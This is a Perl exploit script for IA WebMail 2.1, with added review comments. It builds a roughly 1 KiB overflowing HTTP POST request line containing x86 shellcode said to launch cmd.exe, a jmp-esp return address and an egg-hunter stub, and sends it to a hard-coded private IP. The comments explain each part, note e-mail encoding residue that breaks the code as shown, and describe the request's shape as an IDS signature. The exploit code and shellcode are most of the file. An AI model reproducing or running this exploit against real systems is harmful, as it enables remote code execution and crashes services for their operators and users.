#!/usr/bin/perl
#
# IA WebMail 2.1 exploit. Not very intrusive because it only launches a
# cmd.exe. Unfortunately, it does crash the program.
#
# The exploit below does the following (the author's ASCII diagram did not
# survive re-encoding; the layout it described is the one $buffer builds
# below): "A" padding, an "ABBA" marker, the payload, more "A" padding, a
# 4-byte return address, then a short "seek" stub. The marker bytes
# 0x41 0x42 0x42 0x41 also appear as a literal inside $seek_code, which is
# consistent with the author's description of the stub locating the marker
# and then executing what follows it (not verified here).
#
# Pretty inefficient but I think its cool ;-)
#
# The return address is a jmp esp from the iareg.dll object (the author's
# claim; the four bytes are "\x33\xbd\x02\x10" below).
#
# NOTE(review): this file carries quoted-printable residue ("=3D>" where
# the source read "=>"), i.e. it was lifted from an e-mail body and is not
# runnable as-is. It also has no "use strict; use warnings;", uses package
# globals throughout, and calls the constructor in indirect-object syntax
# (new IO::Socket::INET ...) rather than IO::Socket::INET->new(...). The
# peer is hard-coded to a private (RFC 1918) address.
#
# From a defender's view: what goes on the wire is a POST whose request
# line holds roughly 1 KiB of mostly "A" bytes plus non-printable payload
# bytes in place of a URI (from the lengths below:
# 250 + 4 + 50 + 736 + 4 + 29 = 1073 bytes). An oversized or binary-laden
# request line of this shape is a straightforward WAF/IDS signature, and
# the crash the author mentions leaves a service outage as a second trace.

use IO::Socket;

# 29-byte x86 stub appended at the very end of the request. The immediate
# "\x41\x42\x42\x41" inside it is the "ABBA" marker placed earlier in the
# buffer.
$seek_code = "\x31\xc0\x31\xdb\xb0\x12\xc1\xe0\x10\x66\xb8\x11\xf8\xbb\x41".
             "\x42\x42\x41\x40\x8b\x08\x39\xd9\x75\xf9\x43\x41\xff\xd0";

# 50-byte payload placed right after the marker; per the header comment it
# starts cmd.exe (not verified here).
$shell = "\xeb\x11\x5e\x31\xc9\xb1\x1a\x80\x6c\x0e\xff\x1a\x80\xe9\x01".
         "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xa5\x06\x6f\xa5\x06\x82".
         "\x7f\x92\x7f\x3a\x82\x7d\x87\x7e\x48\xa7\x5f\x12\x6a\xd2\xd9".
         "\xa8\x1b\x92\x19\xea";

# TCP connection to the hard-coded peer. "=3D>" is the e-mail encoding
# artifact mentioned above, not Perl syntax.
my $socket = new IO::Socket::INET (PeerAddr =3D> '10.0.50.228',
                                   PeerPort =3D> '8180',
                                   Proto =3D> 'tcp');
die "Could not create socket: $!\n" unless $socket;

# Build the request "path". Total length is fixed at 1073 bytes regardless
# of $shell's size, because the leading padding is sized to keep the marker
# and payload at byte offset 250 (300 bytes up to and including the payload).
$buffer = "A" x (300 - length($shell));   # 250 bytes of padding
$buffer .= "ABBA";                        # marker searched for by $seek_code
$buffer .= $shell;                        # 50-byte payload
$buffer .= "A" x 736;                     # padding up to the saved return address
$buffer .= "\x33\xbd\x02\x10";            # return address (author: jmp esp in iareg.dll)
$buffer .= "$seek_code";                  # seek stub; the quotes around the scalar are redundant

# Send the whole thing as the request-target of an HTTP/1.0 POST. The print
# is unchecked and the line terminator is a bare "\n\n"; the socket is never
# explicitly closed, it goes away when the script exits after the sleep.
print $socket "POST /" . $buffer . " HTTP/1.0\n\n";
sleep(1);